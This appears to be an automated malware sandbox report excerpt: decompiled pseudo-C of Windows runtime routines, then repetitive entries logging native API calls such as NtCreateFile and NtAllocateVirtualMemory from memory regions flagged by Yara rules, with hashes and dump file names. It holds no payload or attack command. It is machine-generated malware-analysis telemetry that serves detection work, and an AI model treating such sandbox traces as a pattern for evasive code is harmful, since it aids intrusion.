                                                                                                                                                  							E02583F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                  							_t53 =  *_t85;
                                                                                                                                                  							_t93 = _t92 + 0x20;
                                                                                                                                                  							_t67 = _t67 + 1;
                                                                                                                                                  							__eflags = _t53 - 0xffffffff;
                                                                                                                                                  							if(_t53 != 0xffffffff) {
                                                                                                                                                  								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                  								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t67 - 2;
                                                                                                                                                  							if(_t67 > 2) {
                                                                                                                                                  								__eflags = _t85 - 0x26120c0;
                                                                                                                                                  								if(_t85 != 0x26120c0) {
                                                                                                                                                  									_t76 = _a4;
                                                                                                                                                  									__eflags = _a4 - _a8;
                                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                                  										E025B217A(_t71, __eflags, _t85);
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_push("RTL: Re-Waiting\n");
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push(0x65);
                                                                                                                                                  							_a8 = _a4;
                                                                                                                                                  							E02583F92();
                                                                                                                                                  							_t91 = _t93 + 0xc;
                                                                                                                                                  							__eflags =  *0x7ffe0382;
                                                                                                                                                  							if( *0x7ffe0382 != 0) {
                                                                                                                                                  								goto L21;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L36;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					return _t40;
                                                                                                                                                  				}
                                                                                                                                                  				L36:
                                                                                                                                                  			}

































                                                                                                                                                  0x00000000
                                                                                                                                                  0x0255eb99
                                                                                                                                                  0x0255ec85
                                                                                                                                                  0x0255ec85
                                                                                                                                                  0x0255ec85
                                                                                                                                                  0x00000000

                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025924BD
                                                                                                                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0259248D
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 025924FA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                  • API String ID: 0-3177188983
                                                                                                                                                  • Opcode ID: 40391dea3b3b0339b364a4a9ba0471a4a3641d1af9e355c4397c8c9c56922005
                                                                                                                                                  • Instruction ID: f32b32e5f25ce8c7ffeb2a9629a180b115012a23cb9099018fd5f759967a4e87
                                                                                                                                                  • Opcode Fuzzy Hash: 40391dea3b3b0339b364a4a9ba0471a4a3641d1af9e355c4397c8c9c56922005
                                                                                                                                                  • Instruction Fuzzy Hash: 3541F570600615BBDB20DB68DC95FAA7BB9BF85720F108A06FD59DB2C0D734E941CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0256FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _t105;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				char _t114;
                                                                                                                                                  				short _t115;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				signed short* _t119;
                                                                                                                                                  				short _t120;
                                                                                                                                                  				char _t122;
                                                                                                                                                  				void* _t127;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  				signed int _t136;
                                                                                                                                                  				intOrPtr _t143;
                                                                                                                                                  				signed int _t158;
                                                                                                                                                  				signed short* _t164;
                                                                                                                                                  				signed int _t167;
                                                                                                                                                  				void* _t170;
                                                                                                                                                  
                                                                                                                                                  				_t158 = 0;
                                                                                                                                                  				_t164 = _a4;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v28 = 0;
                                                                                                                                                  				_t136 = 0;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                  					if(_t167 == _t158) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t118 = _v20 - _t158;
                                                                                                                                                  					if(_t118 == 0) {
                                                                                                                                                  						if(_t167 == 0x3a) {
                                                                                                                                                  							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                  								break;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t119 =  &(_t164[1]);
                                                                                                                                                  								if( *_t119 != _t167) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t143 = 2;
                                                                                                                                                  								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                  								_v28 = 1;
                                                                                                                                                  								_v8 = _t143;
                                                                                                                                                  								_t136 = _t136 + 1;
                                                                                                                                                  								L47:
                                                                                                                                                  								_t164 = _t119;
                                                                                                                                                  								_v20 = _t143;
                                                                                                                                                  								L14:
                                                                                                                                                  								if(_v24 == _t158) {
                                                                                                                                                  									L19:
                                                                                                                                                  									_t164 =  &(_t164[1]);
                                                                                                                                                  									_t158 = 0;
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v12 == _t158) {
                                                                                                                                                  									if(_v16 > 4) {
                                                                                                                                                  										L29:
                                                                                                                                                  										return 0xc000000d;
                                                                                                                                                  									}
                                                                                                                                                  									_t120 = E0256EE02(_v24, _t158, 0x10);
                                                                                                                                                  									_t170 = _t170 + 0xc;
                                                                                                                                                  									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                  									_t136 = _t136 + 1;
                                                                                                                                                  									goto L19;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v16 > 3) {
                                                                                                                                                  									goto L29;
                                                                                                                                                  								}
                                                                                                                                                  								_t122 = E0256EE02(_v24, _t158, 0xa);
                                                                                                                                                  								_t170 = _t170 + 0xc;
                                                                                                                                                  								if(_t122 > 0xff) {
                                                                                                                                                  									goto L29;
                                                                                                                                                  								}
                                                                                                                                                  								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L21:
                                                                                                                                                  						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                  							break;
                                                                                                                                                  						} else {
                                                                                                                                                  							if(E0256685D(_t167, 4) == 0) {
                                                                                                                                                  								if(E0256685D(_t167, 0x80) != 0) {
                                                                                                                                                  									if(_v12 > 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t127 = 1;
                                                                                                                                                  									_a7 = 1;
                                                                                                                                                  									_v24 = _t164;
                                                                                                                                                  									_v20 = 1;
                                                                                                                                                  									_v16 = 1;
                                                                                                                                                  									L36:
                                                                                                                                                  									if(_v20 == _t127) {
                                                                                                                                                  										goto L19;
                                                                                                                                                  									}
                                                                                                                                                  									_t158 = 0;
                                                                                                                                                  									goto L14;
                                                                                                                                                  								}
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_a7 = 0;
                                                                                                                                                  							_v24 = _t164;
                                                                                                                                                  							_v20 = 1;
                                                                                                                                                  							_v16 = 1;
                                                                                                                                                  							goto L19;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t130 = _t118 - 1;
                                                                                                                                                  					if(_t130 != 0) {
                                                                                                                                                  						if(_t130 == 1) {
                                                                                                                                                  							goto L21;
                                                                                                                                                  						}
                                                                                                                                                  						_t127 = 1;
                                                                                                                                                  						goto L36;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t167 >= 0x80) {
                                                                                                                                                  						L7:
                                                                                                                                                  						if(_t167 == 0x3a) {
                                                                                                                                                  							_t158 = 0;
                                                                                                                                                  							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                  								break;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t119 =  &(_t164[1]);
                                                                                                                                                  								if( *_t119 != _t167) {
                                                                                                                                                  									_v8 = _v8 + 1;
                                                                                                                                                  									L13:
                                                                                                                                                  									_v20 = _t158;
                                                                                                                                                  									goto L14;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v28 != 0) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_v28 = _v8 + 1;
                                                                                                                                                  								_t143 = 2;
                                                                                                                                                  								_v8 = _v8 + _t143;
                                                                                                                                                  								goto L47;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                  							break;
                                                                                                                                                  						} else {
                                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                                  							_t158 = 0;
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if(E0256685D(_t167, 4) != 0) {
                                                                                                                                                  						_v16 = _v16 + 1;
                                                                                                                                                  						goto L19;
                                                                                                                                                  					}
                                                                                                                                                  					if(E0256685D(_t167, 0x80) != 0) {
                                                                                                                                                  						_v16 = _v16 + 1;
                                                                                                                                                  						if(_v12 > 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_a7 = 1;
                                                                                                                                                  						goto L19;
                                                                                                                                                  					}
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				 *_a8 = _t164;
                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                  					if(_v12 != 3) {
                                                                                                                                                  						goto L29;
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = _v8 + 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                  					if(_v20 != 1) {
                                                                                                                                                  						if(_v20 != 2) {
                                                                                                                                                  							goto L29;
                                                                                                                                                  						}
                                                                                                                                                  						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                  						L65:
                                                                                                                                                  						_t105 = _v28;
                                                                                                                                                  						if(_t105 != 0) {
                                                                                                                                                  							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                  							E02548980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                  							_t110 = 8;
                                                                                                                                                  							E0253DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                  						}
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v12 != 0) {
                                                                                                                                                  						if(_v16 > 3) {
                                                                                                                                                  							goto L29;
                                                                                                                                                  						}
                                                                                                                                                  						_t114 = E0256EE02(_v24, 0, 0xa);
                                                                                                                                                  						_t170 = _t170 + 0xc;
                                                                                                                                                  						if(_t114 > 0xff) {
                                                                                                                                                  							goto L29;
                                                                                                                                                  						}
                                                                                                                                                  						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                  						goto L65;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v16 > 4) {
                                                                                                                                                  						goto L29;
                                                                                                                                                  					}
                                                                                                                                                  					_t115 = E0256EE02(_v24, 0, 0x10);
                                                                                                                                                  					_t170 = _t170 + 0xc;
                                                                                                                                                  					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                  					goto L65;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L29;
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x02582018
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0256fd36
                                                                                                                                                  0x0256fe0f
                                                                                                                                                  0x0256fe16
                                                                                                                                                  0x0257a3ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0257a3b3
                                                                                                                                                  0x0257a3b3
                                                                                                                                                  0x0256fe1f
                                                                                                                                                  0x0259ed25
                                                                                                                                                  0x0259ed86
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed91
                                                                                                                                                  0x0259ed95
                                                                                                                                                  0x0259ed95
                                                                                                                                                  0x0259ed9a
                                                                                                                                                  0x0259edad
                                                                                                                                                  0x0259edb3
                                                                                                                                                  0x0259edba
                                                                                                                                                  0x0259edc4
                                                                                                                                                  0x0259edc9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259edcc
                                                                                                                                                  0x0259ed2a
                                                                                                                                                  0x0259ed55
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed61
                                                                                                                                                  0x0259ed66
                                                                                                                                                  0x0259ed6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed7d
                                                                                                                                                  0x0259ed30
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259ed3c
                                                                                                                                                  0x0259ed43
                                                                                                                                                  0x0259ed4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3965848254-0
                                                                                                                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction ID: 880dc5f2727d8f4ca098a6ef1281a43632b57bd68fdcb8681bc9f1064ca207ad
                                                                                                                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction Fuzzy Hash: 0391B171E0020AEFDF25CF98D8497BEBBB4FF45308F20846AD406A7551E7305A51CB99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Executed Functions

                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: .z`$wK
                                                                                                                                                  • API String ID: 823142352-635088003
                                                                                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                  • Instruction ID: 0a441b4dce64d7bec0249cb88b86821ea0342ac4fd6d7c1531e9a6fcd94e2e80
                                                                                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                  • Instruction Fuzzy Hash: 60F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: .z`$wK
                                                                                                                                                  • API String ID: 823142352-635088003
                                                                                                                                                  • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                  • Instruction ID: b4e28f81552dabf8d26079c265d62c16fd98c5fab384b920943907eb4ff142bf
                                                                                                                                                  • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                  • Instruction Fuzzy Hash: 1FF0B6B2204149ABCB08DF98DD85CDBB7ADBF8C354B05864CFA5D93201D630E8518BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: .z`$wK
                                                                                                                                                  • API String ID: 823142352-635088003
                                                                                                                                                  • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction ID: 72a27c67d75c62c2b748e7d4a7c187b675e4c59541f47ddf6178da0e82cfd5df
                                                                                                                                                  • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction Fuzzy Hash: BBF06CB2215109AF8B58DF9CD890DEB73F9BF8C354B159648FA4D93201D631E851CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                  • Instruction ID: fead514cabe4814d174c9c8fb60ffadff092d031a689921e6f23a6cb00221d16
                                                                                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                  • Instruction Fuzzy Hash: 10F0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                  • Instruction ID: 15814952b34f15fadc7ea73fb5bf1213ce15886017840d43c7bd674ad2d8b0e3
                                                                                                                                                  • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                  • Instruction Fuzzy Hash: F7F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BE1DA7251C630E8118BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                  • Instruction ID: 2dddf084dcba1ec77312e3149dd3078b319210c9a9e876e468a01dc41263e8ba
                                                                                                                                                  • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                  • Instruction Fuzzy Hash: 27F052B2210218AFCB18DF88DC91EEB77ADAF88310F158208FE1C97241C630E910CBE0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
